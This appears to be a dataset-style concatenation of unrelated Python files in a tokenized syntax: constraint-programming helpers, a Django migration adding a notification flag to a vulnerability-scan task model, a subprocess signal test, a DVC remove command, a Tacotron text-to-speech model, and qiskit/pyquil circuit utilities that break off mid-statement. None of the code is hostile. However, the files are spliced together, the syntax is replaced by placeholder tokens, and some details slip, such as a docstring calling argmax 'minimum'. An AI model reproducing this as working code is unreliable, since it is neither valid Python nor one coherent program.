variables:")<line_sep>mf=flatten_model(model)<line_sep>print_variables(mf)<line_sep>print(mf)<line_sep>print()<block_end><def_stmt>argmax x p<block_start>""" argmax(x,p) Ensure that p is the argmax, i.e. the position of the maximum value in x. Note: If there are many maximum values then argmax(x,p) will find all these values. 
"""<line_sep>n=len(x)<line_sep>constraints=[]<for_stmt>i range(n)<block_start>constraints<augadd>[(p<ne>i).implies(x[p]<g>x[i])]<block_end><return>constraints<block_end><def_stmt>argmin x p<block_start>""" argmin(x,p) Ensure that p is the argmin, i.e. the position of the minimum value in x. Note: If there are many minimum values then argmin(x,p) will find all these values. """<line_sep>n=len(x)<line_sep>constraints=[]<for_stmt>i range(n)<block_start>constraints<augadd>[(p<ne>i).implies(x[p]<l>x[i])]<block_end><return>constraints<block_end><def_stmt>argmin_except_c x p c<block_start>""" argmin_except_c(x,p,c) Ensure that p is the argmin, i.e. the position of the minimum value in x, but ignores any value of c. Note: - If there are many minimum values then argmin_except_c(x,p,c) will find all these values. - We assume that there are at least one value != c. """<line_sep>n=len(x)<line_sep>constraints=[x[p]<ne>c]<for_stmt>i range(n)<block_start>constraints<augadd>[(p<ne>i).implies((x[i]<eq>c)|(x[p]<l>x[i]))]<block_end><return>constraints<block_end><def_stmt>argmin_except_0 x p<block_start>""" argmin_except_0(x,p) Ensure that p is the argmin, i.e. the position of the minimum value in x, but ignores any value of 0. Note: - If there are many minimum values then argmin_except_0(x,p) will find all these values. - We assume that there are at least one value > 0. """<line_sep><return>argmin_except_c(x p 0)<block_end><def_stmt>argmax_except_c x p c<block_start>""" argmax_except_c(x,p,c) Ensure that p is the argmax, i.e. the position of the minimum value in x, but ignores any value of c. Note: - If there are many maximum values then argmax_except_c(x,p,c) will find all these values. - We assume that there are at least one value != c. """<line_sep>n=len(x)<line_sep>constraints=[x[p]<ne>c]<for_stmt>i range(n)<block_start>constraints<augadd>[(p<ne>i).implies((x[i]<eq>c)|(x[p]<g>x[i]))]<block_end><return>constraints<block_end><def_stmt>permutation3 x p y<block_start>""" permutation(x,p,y) Ensure that the array y is a permutation of array x with the permutation operations in array p. Example: x = [2,0,1,3] p = [2,1,3,0] What is y? y[0] = x[p[0]] = x[2] = 1 y[1] = x[p[1]] = x[1] = 0 y[2] = x[p[2]] = x[3] = 3 y[3] = x[p[3]] = x[0] = 2 Thus: y = [1,0,3,2] Assumptions: - We assume that x, p, and y has distinct values, i.e. constrained by AllDifferent. We check that: - p has the domain of 0..len(p)-1 """<line_sep>n=len(x)<assert_stmt>n<eq>len(p)<and>n<eq>len(y) f"Length of x, p, and y must be the same"<line_sep>p_lb,p_ub=get_min_max_domain(p)<assert_stmt>p_lb<eq>0<and>p_ub<eq>n-1 "Domain value of p must be 0..n-1"<line_sep>constraints=[]<for_stmt>i range(n)<block_start>constraints<augadd>[y[i]<eq>x[p[i]]]<block_end><return>constraints<block_end><def_stmt>permutation x y<block_start>""" permutation(x,y) Ensure that the array y is a permutation of array x, connected with some unknown permutation. permutation3(x,p,y) is used (which see). """<line_sep>n=len(x)<line_sep>p=intvar(0 n-1 shape=n)<line_sep><return>permutation3(x p y)<block_end><def_stmt>get_min_max_domain x<block_start>""" get_min_max_domain(x) Return the minimum and maximum domain of an array x. """<line_sep>n=len(x)<line_sep>x_lb=min([x[i].lb<for>i range(n)])<line_sep>x_ub=max([x[i].ub<for>i range(n)])<line_sep><return>[x_lb x_ub]<block_end><def_stmt>chain op x<block_start>""" chain(op,x) Ensure that all elements pairwise satisfies the binary operator op. Note: In order for this to work the operator must be from the operator library, e.g. 
operator.lt, operator.ne, e.g.: chain(operator.lt,x) Note: Many of the binary operator.* have a definition already, e.g. (from cpmpy_hakank.py): increasing, increasing_strict, decreasing, decreasing_strict and AllDifferent, AllEqual """<line_sep>n=len(x)<line_sep>constraints=[]<for_stmt>i range(1 n)<block_start>constraints<augadd>[op(x[i-1] x[i])]<block_end><return>constraints<block_end><def_stmt>minimum_except_c x min_val c allow_all_c=<false><block_start>""" minimum_except_c(x,min_val,c,allow_all_c) Ensures that min_val is the minimum value in array x, ignoring the value of c. The flag allow_all_c: - If True: allow an array with only c values: min_val is thus c. - If False: assume that there is at least one non c value. min_val must be != c. """<line_sep>n=len(x)<line_sep>ix=intvar(0 n-1)<line_sep># Ensure that min_val is in x constraints=[min_val<eq>x[ix]]<for_stmt>j range(n)<block_start>constraints<augadd>[(min_val<le>x[j])|(x[j]<eq>c)]<block_end><if_stmt>allow_all_c<block_start>max_val=max(x)# To be able to handle the case when there are only c values constraints<augadd>[(max_val<eq>c)<eq>(min_val<eq>c)]<block_end><else_stmt><block_start>constraints<augadd>[min_val<ne>c]<block_end><return>constraints<block_end><def_stmt>minimum_except_0 x min_val allow_all_0s=<false><block_start>""" minimum_except_0(x,min_val,allow_all_0s) Ensures that min_val is the minimum value in array x, ignoring 0s. The flag allow_all_0s: - If True: allow an array with only 0 values: min_val is thus 0. - If False: assume that there is at least one non 0 value. min_val must be != 0. """<line_sep><return>minimum_except_c(x min_val 0 allow_all_0s)<block_end><def_stmt>value_precede s t x<block_start>""" value_precede(s,t, x) Ensures that the first occurrence of the value s precedes the first occurrence of the value t in array x if both s and t are in x. This means that for t to occur in x then s has to precede t. This definition is inspired by MiniZinc's definition value_precede.mzn """<line_sep>n=len(x)<line_sep>bs=boolvar(shape=n+1)<line_sep>constraints=[]<for_stmt>i range(n)<block_start>xis=boolvar()<line_sep>constraints<augadd>[(xis<eq>1)<eq>(x[i]<eq>s) (xis<eq>1).implies(bs[i+1]<eq>1) (xis<eq>0).implies(bs[i]<eq>bs[i+1]) (bs[i]<eq>0).implies(x[i]<ne>t)]<block_end>constraints<augadd>[bs[0]<eq>0]<line_sep><return>constraints<block_end><def_stmt>value_precede_chain c x<block_start>""" value_precede_chain(c, x) Ensures that the value c[i-1] precedes the value c[i] in the array x if both c[i-1] and c[i] are in x. See value_precede(). """<line_sep>n=len(c)<line_sep>constraints=[]<for_stmt>i range(1 n)<block_start>constraints<augadd>[value_precede(c[i-1] c[i] x)]<block_end><return>constraints<block_end><def_stmt>sliding_sum low up seq x<block_start>""" sliding_sum(low, up, seq, x) Ensure that all sequences of length seq in x sum to between low and up. """<line_sep>vlen=len(x)<line_sep>constraints=[]<for_stmt>i range(vlen-seq+1)<block_start>s=intvar(low up)<line_sep>constraints<augadd>[s<eq>sum([x[j]<for>j range(i i+seq)])]<block_end><return>constraints<block_end><def_stmt>no_overlap s1 d1 s2 d2<block_start>""" no_overlap(s1, d1, s2, d2) Ensures that task 1 (start time s1 with duration d1) does not overlap with task 2 (start time s2 with duration d2) """<line_sep><return>[(s1+d1<le>s2)|(s2+d2<le>s1)]<block_end><def_stmt>is_prime n<block_start>""" is_prime(n) Returns True if the number n is a prime number, otherwise returns False. 
"""<if_stmt>n<l>2<block_start><return><false><block_end><if_stmt>n<eq>2<block_start><return><true><block_end><if_stmt><not>n&1<block_start><return><false><block_end><for_stmt>i range(3 1+int(math.sqrt(n)) 2)<block_start><if_stmt>n%i<eq>0<block_start><return><false><block_end><block_end><return><true><block_end><def_stmt>primes limit<block_start>""" primes(limit) Returns the prime numbers below limit. """<line_sep>primes=[2]<line_sep>i=3<for_stmt>i range(3 limit 2)<block_start><if_stmt>is_prime(i)<block_start>primes.append(i)<block_end><block_end><return>primes<block_end><def_stmt>all_different_reif x b<block_start>""" all_different_reif(x,b) b == 1 if all values in x are different, else 0. """<line_sep>n=len(x)<line_sep>m=intvar(1 n)<line_sep><return>[nvalue(m x) (m<eq>n)<eq>(b<eq>1)]<block_end><def_stmt>all_different_reif_m model x<block_start>""" all_different_reif(x,b) b == 1 if all values in x are different, else 0. This version returns b. Note that the model is a parameter so it must be created first: x = intvar(...) b = boolvar() model = Model(...) model += [b == all_different_reif_m(model,x)] """<line_sep>n=len(x)<line_sep>m=intvar(1 n)<line_sep>b=boolvar()<line_sep>model<augadd>[nvalue(m x) (m<eq>n)<eq>(b<eq>1)]<line_sep><return>b<block_end><def_stmt>lex_chain_less x<block_start>""" lex_chain_less(x) Require that all the rows are lexicographically sorted (but not the columns as in lex2). See: http://www.emn.fr/z-info/sdemasse/gccat/Clex_chain_less.html """<line_sep>n=len(x)<line_sep>m=len(x[0])<line_sep>constraints=[]<for_stmt>i range(1 n)<block_start>constraints<augadd>[lex_less([x[i-1 j]<for>j range(m)] [x[i j]<for>j range(m)])]<block_end><return>constraints<block_end><def_stmt>soft_alldifferent x p<block_start>""" soft_alldifferent(x,p) p is the number of pairs that have the same value. See http://www.emn.fr/z-info/sdemasse/gccat/Csoft_alldifferent_ctr.html """<line_sep>n=len(x)<line_sep><return>[p<eq>sum([x[i]<eq>x[j]<for>i range(n)<for>j range(i+1 n)])]<block_end><def_stmt>among_seq low high seqlen x v<block_start>""" among_seq(low, high, seqlen, x, v) Ensures that all sequences of length SeqLen in the list X contains at least Low and atmost High occurrences of V. """<line_sep>n=len(x)<line_sep>size=n-seqlen+1<line_sep>constraints=[]<for_stmt>i range(size)<block_start>seq=[x[j]<for>j range(i i+seqlen)]<line_sep>constraints<augadd>[among_range(low high seq v)]<block_end><return>constraints<block_end><def_stmt>among_range low high x v<block_start>""" among_range(low, high, x, v) Ensures that the list x contains at least low and atmost high occurrences of v. Used by among_seq. """<line_sep>xs=intvar(0 len(x))<line_sep>vlen=len(v)<line_sep><return>[xs<eq>sum([sum([el<eq>v[i]<for>i range(vlen)])<g>0<for>el x]) xs<ge>low xs<le>high]<block_end><def_stmt>sequence x seq_length lbound ubound<block_start>""" sequence(,length,lbound,ubound) Ensures that all sums of every subsequence of length length in array x is between lbound and ubound """<line_sep>n=len(x)<line_sep>xs=intvar(lbound.lb ubound.ub)<line_sep>constraints=[]<for_stmt>i range(n-seq_length+1)<block_start>constraints<augadd>[xs<eq>sum([x[j]<for>j range(i i+seq_length)]) xs<ge>lbound xs<le>ubound]<block_end><return>constraints<block_end>
# Generated by Django 4.0.1 on 2022-03-14 10:45 <import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('VulnerableScan' '0004_remove_exploitregister_file_object_and_more') ]<line_sep>operations=[migrations.AddField(model_name='vulnerablescantasks' name='notice' field=models.BooleanField(db_column='notice' default=<false> verbose_name='是否钉钉通知') ) ]<block_end>
<import_stmt>signal subprocess sys<line_sep># On Linux this causes os.waitpid to fail with OSError as the OS has already # reaped our child process. The wait() passing the OSError on to the caller # and causing us to exit with an error is what we are testing against. signal.signal(signal.SIGCHLD signal.SIG_IGN)<line_sep>subprocess.Popen([sys.executable '-c' 'print("albatross")']).wait()<line_sep>
<import_stmt>argparse<import_stmt>logging<import_from_stmt>dvc.command completion<import_from_stmt>dvc.command.base CmdBase append_doc_link<import_from_stmt>dvc.exceptions DvcException<line_sep>logger=logging.getLogger(__name__)<class_stmt>CmdRemove(CmdBase)<block_start><def_stmt>run self<block_start><for_stmt>target self.args.targets<block_start><try_stmt><block_start>self.repo.remove(target outs=self.args.outs)<block_end><except_stmt>DvcException<block_start>logger.exception("")<line_sep><return>1<block_end><block_end><return>0<block_end><block_end><def_stmt>add_parser subparsers parent_parser<block_start>REMOVE_HELP=("Remove stages from dvc.yaml and/or"<concat>" stop tracking files or directories.")<line_sep>remove_parser=subparsers.add_parser("remove" parents=[parent_parser] description=append_doc_link(REMOVE_HELP "remove") help=REMOVE_HELP formatter_class=argparse.RawDescriptionHelpFormatter )<line_sep>remove_parser.add_argument("--outs" action="store_true" default=<false> help="Remove outputs as well." )<line_sep>remove_parser.add_argument("targets" nargs="+" help=".dvc files or stages from dvc.yaml to remove." ).complete=completion.DVC_FILE<line_sep>remove_parser.set_defaults(func=CmdRemove)<block_end>
<import_from_stmt>pathlib Path<import_from_stmt>typing Union Dict Any Tuple<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_from_stmt>models.common_layers CBHG<import_from_stmt>utils.text.symbols phonemes<class_stmt>Encoder(nn.Module)<block_start><def_stmt>__init__ self embed_dims num_chars cbhg_channels K num_highways dropout<block_start>super().__init__()<line_sep>self.embedding=nn.Embedding(num_chars embed_dims)<line_sep>self.pre_net=PreNet(embed_dims)<line_sep>self.cbhg=CBHG(K=K in_channels=cbhg_channels channels=cbhg_channels proj_channels=[cbhg_channels cbhg_channels] num_highways=num_highways)<block_end><def_stmt>forward self x<block_start>x=self.embedding(x)<line_sep>x=self.pre_net(x)<line_sep>x.transpose_(1 2)<line_sep>x=self.cbhg(x)<line_sep><return>x<block_end><block_end><class_stmt>PreNet(nn.Module)<block_start><def_stmt>__init__ self in_dims fc1_dims=256 fc2_dims=128 dropout=0.5<block_start>super().__init__()<line_sep>self.fc1=nn.Linear(in_dims fc1_dims)<line_sep>self.fc2=nn.Linear(fc1_dims fc2_dims)<line_sep>self.p=dropout<block_end><def_stmt>forward self x<block_start>x=self.fc1(x)<line_sep>x=F.relu(x)<line_sep>x=F.dropout(x self.p training=self.training)<line_sep>x=self.fc2(x)<line_sep>x=F.relu(x)<line_sep>x=F.dropout(x self.p training=self.training)<line_sep><return>x<block_end><block_end><class_stmt>Attention(nn.Module)<block_start><def_stmt>__init__ self attn_dims<block_start>super().__init__()<line_sep>self.W=nn.Linear(attn_dims attn_dims bias=<false>)<line_sep>self.v=nn.Linear(attn_dims 1 bias=<false>)<block_end><def_stmt>forward self encoder_seq_proj query t# print(encoder_seq_proj.shape) # Transform the query vector <block_start>query_proj=self.W(query).unsqueeze(1)<line_sep># Compute the scores u=self.v(torch.tanh(encoder_seq_proj+query_proj))<line_sep>scores=F.softmax(u dim=1)<line_sep><return>scores.transpose(1 2)<block_end><block_end><class_stmt>LSA(nn.Module)<block_start><def_stmt>__init__ self attn_dim kernel_size=31 filters=32<block_start>super().__init__()<line_sep>self.conv=nn.Conv1d(2 filters padding=(kernel_size-1)<floordiv>2 kernel_size=kernel_size bias=<false>)<line_sep>self.L=nn.Linear(filters attn_dim bias=<true>)<line_sep>self.W=nn.Linear(attn_dim attn_dim bias=<true>)<line_sep>self.v=nn.Linear(attn_dim 1 bias=<false>)<line_sep>self.cumulative=<none><line_sep>self.attention=<none><block_end><def_stmt>init_attention self encoder_seq_proj<block_start>device=next(self.parameters()).device# use same device as parameters b,t,c=encoder_seq_proj.size()<line_sep>self.cumulative=torch.zeros(b t device=device)<line_sep>self.attention=torch.zeros(b t device=device)<block_end><def_stmt>forward self encoder_seq_proj query t<block_start><if_stmt>t<eq>0<block_start>self.init_attention(encoder_seq_proj)<block_end>processed_query=self.W(query).unsqueeze(1)<line_sep>location=torch.cat([self.cumulative.unsqueeze(1) self.attention.unsqueeze(1)] dim=1)<line_sep>processed_loc=self.L(self.conv(location).transpose(1 2))<line_sep>u=self.v(torch.tanh(processed_query+encoder_seq_proj+processed_loc))<line_sep>u=u.squeeze(-1)<line_sep># Smooth Attention #scores = torch.sigmoid(u) / torch.sigmoid(u).sum(dim=1, keepdim=True) scores=F.softmax(u dim=1)<line_sep>self.attention=scores<line_sep>self.cumulative<augadd>self.attention<line_sep><return>scores.unsqueeze(-1).transpose(1 2)<block_end><block_end><class_stmt>Decoder(nn.Module)# Class variable because its value doesn't change between classes # yet ought to be scoped by class because its a 
property of a Decoder <block_start>max_r=20<def_stmt>__init__ self n_mels decoder_dims lstm_dims<block_start>super().__init__()<line_sep>self.register_buffer('r' torch.tensor(1 dtype=torch.int))<line_sep>self.n_mels=n_mels<line_sep>self.prenet=PreNet(n_mels)<line_sep>self.attn_net=LSA(decoder_dims)<line_sep>self.attn_rnn=nn.GRUCell(decoder_dims+decoder_dims<floordiv>2 decoder_dims)<line_sep>self.rnn_input=nn.Linear(2<times>decoder_dims lstm_dims)<line_sep>self.res_rnn1=nn.LSTMCell(lstm_dims lstm_dims)<line_sep>self.res_rnn2=nn.LSTMCell(lstm_dims lstm_dims)<line_sep>self.mel_proj=nn.Linear(lstm_dims n_mels<times>self.max_r bias=<false>)<block_end><def_stmt>zoneout self prev current p=0.1<block_start>device=next(self.parameters()).device# Use same device as parameters mask=torch.zeros(prev.size() device=device).bernoulli_(p)<line_sep><return>prev<times>mask+current<times>(1-mask)<block_end><def_stmt>forward self encoder_seq encoder_seq_proj prenet_in hidden_states cell_states context_vec t# Need this for reshaping mels <block_start>batch_size=encoder_seq.size(0)<line_sep># Unpack the hidden and cell states attn_hidden,rnn1_hidden,rnn2_hidden=hidden_states<line_sep>rnn1_cell,rnn2_cell=cell_states<line_sep># PreNet for the Attention RNN prenet_out=self.prenet(prenet_in)<line_sep># Compute the Attention RNN hidden state attn_rnn_in=torch.cat([context_vec prenet_out] dim=-1)<line_sep>attn_hidden=self.attn_rnn(attn_rnn_in.squeeze(1) attn_hidden)<line_sep># Compute the attention scores scores=self.attn_net(encoder_seq_proj attn_hidden t)<line_sep># Dot product to create the context vector context_vec=scores@encoder_seq<line_sep>context_vec=context_vec.squeeze(1)<line_sep># Concat Attention RNN output w. Context Vector & project x=torch.cat([context_vec attn_hidden] dim=1)<line_sep>x=self.rnn_input(x)<line_sep># Compute first Residual RNN rnn1_hidden_next,rnn1_cell=self.res_rnn1(x (rnn1_hidden rnn1_cell))<if_stmt>self.training<block_start>rnn1_hidden=self.zoneout(rnn1_hidden rnn1_hidden_next)<block_end><else_stmt><block_start>rnn1_hidden=rnn1_hidden_next<block_end>x=x+rnn1_hidden<line_sep># Compute second Residual RNN rnn2_hidden_next,rnn2_cell=self.res_rnn2(x (rnn2_hidden rnn2_cell))<if_stmt>self.training<block_start>rnn2_hidden=self.zoneout(rnn2_hidden rnn2_hidden_next)<block_end><else_stmt><block_start>rnn2_hidden=rnn2_hidden_next<block_end>x=x+rnn2_hidden<line_sep># Project Mels mels=self.mel_proj(x)<line_sep>mels=mels.view(batch_size self.n_mels self.max_r)[: : :self.r]<line_sep>hidden_states=(attn_hidden rnn1_hidden rnn2_hidden)<line_sep>cell_states=(rnn1_cell rnn2_cell)<line_sep><return>mels scores hidden_states cell_states context_vec<block_end><block_end><class_stmt>Tacotron(nn.Module)<block_start><def_stmt>__init__ self embed_dims:int num_chars:int encoder_dims:int decoder_dims:int n_mels:int postnet_dims:int encoder_k:int lstm_dims:int postnet_k:int num_highways:int dropout:float stop_threshold:float<arrow><none><block_start>super().__init__()<line_sep>self.n_mels=n_mels<line_sep>self.lstm_dims=lstm_dims<line_sep>self.decoder_dims=decoder_dims<line_sep>self.encoder=Encoder(embed_dims num_chars encoder_dims encoder_k num_highways dropout)<line_sep>self.encoder_proj=nn.Linear(decoder_dims decoder_dims bias=<false>)<line_sep>self.decoder=Decoder(n_mels decoder_dims lstm_dims)<line_sep>self.postnet=CBHG(postnet_k n_mels postnet_dims [256 80] num_highways)<line_sep>self.post_proj=nn.Linear(postnet_dims<times>2 n_mels 
bias=<false>)<line_sep>self.init_model()<line_sep>self.register_buffer('step' torch.zeros(1 dtype=torch.long))<line_sep>self.register_buffer('stop_threshold' torch.tensor(stop_threshold dtype=torch.float32))<block_end>@property<def_stmt>r self<arrow>int<block_start><return>self.decoder.r.item()<block_end>@r.setter<def_stmt>r self value:int<arrow><none><block_start>self.decoder.r=self.decoder.r.new_tensor(value requires_grad=<false>)<block_end><def_stmt>forward self x:torch.tensor m:torch.tensor<arrow>torch.tensor<block_start>device=next(self.parameters()).device# use same device as parameters <if_stmt>self.training<block_start>self.step<augadd>1<block_end>batch_size,_,steps=m.size()<line_sep># Initialise all hidden states and pack into tuple attn_hidden=torch.zeros(batch_size self.decoder_dims device=device)<line_sep>rnn1_hidden=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>rnn2_hidden=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>hidden_states=(attn_hidden rnn1_hidden rnn2_hidden)<line_sep># Initialise all lstm cell states and pack into tuple rnn1_cell=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>rnn2_cell=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>cell_states=(rnn1_cell rnn2_cell)<line_sep># <GO> Frame for start of decoder loop go_frame=torch.zeros(batch_size self.n_mels device=device)<line_sep># Need an initial context vector context_vec=torch.zeros(batch_size self.decoder_dims device=device)<line_sep># Project the encoder outputs to avoid # unnecessary matmuls in the decoder loop encoder_seq=self.encoder(x)<line_sep>encoder_seq_proj=self.encoder_proj(encoder_seq)<line_sep># Need a couple of lists for outputs mel_outputs,attn_scores=[] []<line_sep># Run the decoder loop <for_stmt>t range(0 steps self.r)<block_start>prenet_in=m[: : t-1]<if>t<g>0<else>go_frame<line_sep>mel_frames,scores,hidden_states,cell_states,context_vec=self.decoder(encoder_seq encoder_seq_proj prenet_in hidden_states cell_states context_vec t)<line_sep>mel_outputs.append(mel_frames)<line_sep>attn_scores.append(scores)<block_end># Concat the mel outputs into sequence mel_outputs=torch.cat(mel_outputs dim=2)<line_sep># Post-Process for Linear Spectrograms postnet_out=self.postnet(mel_outputs)<line_sep>linear=self.post_proj(postnet_out)<line_sep>linear=linear.transpose(1 2)<line_sep># For easy visualisation attn_scores=torch.cat(attn_scores 1)<line_sep># attn_scores = attn_scores.cpu().data.numpy() <return>mel_outputs linear attn_scores<block_end><def_stmt>generate self x:torch.tensor steps=2000<arrow>Tuple[torch.tensor torch.tensor torch.tensor]<block_start>self.eval()<line_sep>device=next(self.parameters()).device# use same device as parameters batch_size=1<line_sep># Need to initialise all hidden states and pack into tuple for tidyness attn_hidden=torch.zeros(batch_size self.decoder_dims device=device)<line_sep>rnn1_hidden=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>rnn2_hidden=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>hidden_states=(attn_hidden rnn1_hidden rnn2_hidden)<line_sep># Need to initialise all lstm cell states and pack into tuple for tidyness rnn1_cell=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>rnn2_cell=torch.zeros(batch_size self.lstm_dims device=device)<line_sep>cell_states=(rnn1_cell rnn2_cell)<line_sep># Need a <GO> Frame for start of decoder loop go_frame=torch.zeros(batch_size self.n_mels device=device)<line_sep># Need an initial context vector 
context_vec=torch.zeros(batch_size self.decoder_dims device=device)<line_sep># Project the encoder outputs to avoid # unnecessary matmuls in the decoder loop encoder_seq=self.encoder(x)<line_sep>encoder_seq_proj=self.encoder_proj(encoder_seq)<line_sep># Need a couple of lists for outputs mel_outputs,attn_scores=[] []<line_sep># Run the decoder loop <for_stmt>t range(0 steps self.r)<block_start>prenet_in=mel_outputs[-1][: : -1]<if>t<g>0<else>go_frame<line_sep>mel_frames,scores,hidden_states,cell_states,context_vec=self.decoder(encoder_seq encoder_seq_proj prenet_in hidden_states cell_states context_vec t)<line_sep>mel_outputs.append(mel_frames)<line_sep>attn_scores.append(scores)<line_sep># Stop the loop if silent frames present <if_stmt>(mel_frames<l>self.stop_threshold).all()<and>t<g>10<block_start><break><block_end><block_end># Concat the mel outputs into sequence mel_outputs=torch.cat(mel_outputs dim=2)<line_sep># Post-Process for Linear Spectrograms postnet_out=self.postnet(mel_outputs)<line_sep>linear=self.post_proj(postnet_out)<line_sep>linear=linear.transpose(1 2)[0].cpu().data.numpy()<line_sep>mel_outputs=mel_outputs[0].cpu().data.numpy()<line_sep># For easy visualisation attn_scores=torch.cat(attn_scores 1)<line_sep>attn_scores=attn_scores.cpu().data.numpy()[0]<line_sep>self.train()<line_sep><return>mel_outputs linear attn_scores<block_end><def_stmt>init_model self<block_start><for_stmt>p self.parameters()<block_start><if_stmt>p.dim()<g>1<block_start>nn.init.xavier_uniform_(p)<block_end><block_end><block_end><def_stmt>get_step self<block_start><return>self.step.data.item()<block_end><def_stmt>reset_step self# assignment to parameters or buffers is overloaded, updates internal dict entry <block_start>self.step=self.step.data.new_tensor(1)<block_end>@classmethod<def_stmt>from_config cls config:Dict[str Any]<arrow>'Tacotron'<block_start>model_config=config['tacotron']['model']<line_sep>model_config['num_chars']=len(phonemes)<line_sep>model_config['n_mels']=config['dsp']['num_mels']<line_sep><return>Tacotron(**model_config)<block_end>@classmethod<def_stmt>from_checkpoint cls path:Union[Path str]<arrow>'Tacotron'<block_start>checkpoint=torch.load(path map_location=torch.device('cpu'))<line_sep>model=Tacotron.from_config(checkpoint['config'])<line_sep>model.load_state_dict(checkpoint['model'])<line_sep><return>model<block_end><block_end>
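# Usage sketch for the Tacotron class above (kept as comments; the checkpoint path and
# input shapes are assumptions, not taken from the original project):
# model = Tacotron.from_checkpoint('checkpoints/taco_step100k.pt')   # hypothetical path
# model.r = 2                                  # routed through the r setter -> decoder buffer
# print('steps trained:', model.get_step())
# x = torch.randint(0, len(phonemes), (1, 30))  # one sequence of phoneme ids
# mel, linear, attn = model.generate(x, steps=400)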
<import_stmt>itertools<import_stmt>numpy<as>np<import_stmt>scipy<import_stmt>socket<import_stmt>subprocess<import_stmt>time<def_stmt>get_free_port <block_start>sock=socket.socket()<line_sep>sock.bind(('' 0))<line_sep>port=sock.getsockname()[1]<line_sep>sock.close()<line_sep><return>port<block_end><def_stmt>init_qvm_and_quilc qvm_executable="qvm" quilc_executable="quilc"<block_start>qvm_port=get_free_port()<line_sep>quilc_port=get_free_port()<line_sep>qvm_server=subprocess.Popen([qvm_executable "-S" "-p" str(qvm_port)])<line_sep>quilc_server=subprocess.Popen([quilc_executable "-R" "-p" str(quilc_port)])<line_sep>fc=ForestConnection(sync_endpoint='http://127.0.0.1:'+str(qvm_port) compiler_endpoint='tcp://127.0.0.1:'+str(quilc_port))<line_sep>time.sleep(5)<line_sep><return>qvm_server quilc_server fc<block_end><def_stmt>get_amplitudes circuit<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>backend=Aer.get_backend('statevector_simulator')<line_sep>job=execute(circuit backend)<line_sep>amplitudes=job.result().get_statevector(circuit)<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start>wf_sim=WavefunctionSimulator(connection=fc)<line_sep>wavefunction=wf_sim.wavefunction(circuit)<line_sep>amplitudes=wavefunction.amplitudes<block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>amplitudes<block_end><def_stmt>get_counts circuit num_shots=100<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>backend=Aer.get_backend('qasm_simulator')<line_sep>job=execute(circuit backend shots=num_shots)<line_sep>result=job.result()<line_sep>counts=result.get_counts(circuit)<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start>n_qubits=len(circuit.get_qubits())<line_sep>circuit.wrap_in_numshots_loop(num_shots)<line_sep>qc=get_qc(str(n_qubits)+'q-qvm' connection=fc)<line_sep>executable=qc.compile(circuit)<line_sep>result=qc.run(executable)<line_sep>classical_bits=get_classical_bits(circuit)<line_sep>counts={}<for_stmt>bitstring itertools.product(*[{1 0}<for>_ range(classical_bits)])<block_start>key="".join(str(i)<for>i bitstring)<line_sep>value=sum([tuple(d.tolist())<eq>bitstring<for>d result])<line_sep>counts[key]=value<block_end><block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>counts<block_end><def_stmt>get_single_measurement_counts circuit num_shots=100<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>backend=Aer.get_backend('qasm_simulator')<line_sep>job=execute(circuit backend shots=num_shots)<line_sep>result=job.result()<line_sep>counts=result.get_counts(circuit)<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start>n_qubits=len(circuit.get_qubits())<line_sep>circuit.wrap_in_numshots_loop(num_shots)<line_sep>qc=get_qc(str(n_qubits)+'q-qvm' connection=fc)<line_sep>executable=qc.compile(circuit)<line_sep>result=qc.run(executable)<line_sep>classical_bits=get_classical_bits(circuit)<line_sep>counts={}<for_stmt>bitstring itertools.product(*[{1 0}<for>_ range(classical_bits)])<block_start>key="".join(str(i)<for>i bitstring)<line_sep>counts[key]=0<block_end>counts["0"<times>classical_bits]=(result<eq>0).sum()<line_sep>counts["0"<times>(classical_bits-1)+"1"]=(result<eq>1).sum()<block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>counts<block_end><def_stmt>get_classical_bits 
circuit<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>classical_bits=circuit.cregs[0].size<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start><for_stmt>instruction circuit.instructions<block_start><if_stmt>isinstance(instruction pyquil.quilbase.Declare)<block_start>classical_bits=instruction.memory_size<line_sep><break><block_end><block_end><block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>classical_bits<block_end><def_stmt>get_circuit_length circuit<block_start><if_stmt>isinstance(circuit qiskit.circuit.quantumcircuit.QuantumCircuit)<block_start>program_length=sum(circuit.count_ops().values())<block_end><elif_stmt>isinstance(circuit pyquil.quil.Program)<block_start>program_length=len(circuit.instructions)<block_end><else_stmt><block_start><raise>ValueError("Unknown circuit type")<block_end><return>program_length<block_end><if_stmt>__name__<eq>"__main__"<block_start><try_stmt><block_start><import_stmt>grove<import_stmt>pyquil<import_from_stmt>grove.pyvqe vqe<import_from_stmt>pyquil Program get_qc<import_from_stmt>pyquil.paulis PauliSum PauliTerm exponential_map sZ<import_from_stmt>pyquil.api WavefunctionSimulator ForestConnection<import_from_stmt>pyquil.gates *<try_stmt><block_start>qvm_server,quilc_server,fc=init_qvm_and_quilc()<line_sep>is_forest=<true><block_end><except_stmt>FileNotFoundError<block_start><try_stmt><block_start>prefix="/home/local/bin/"<line_sep>qvm_server,quilc_server,fc=init_qvm_and_quilc(prefix+"qvm" 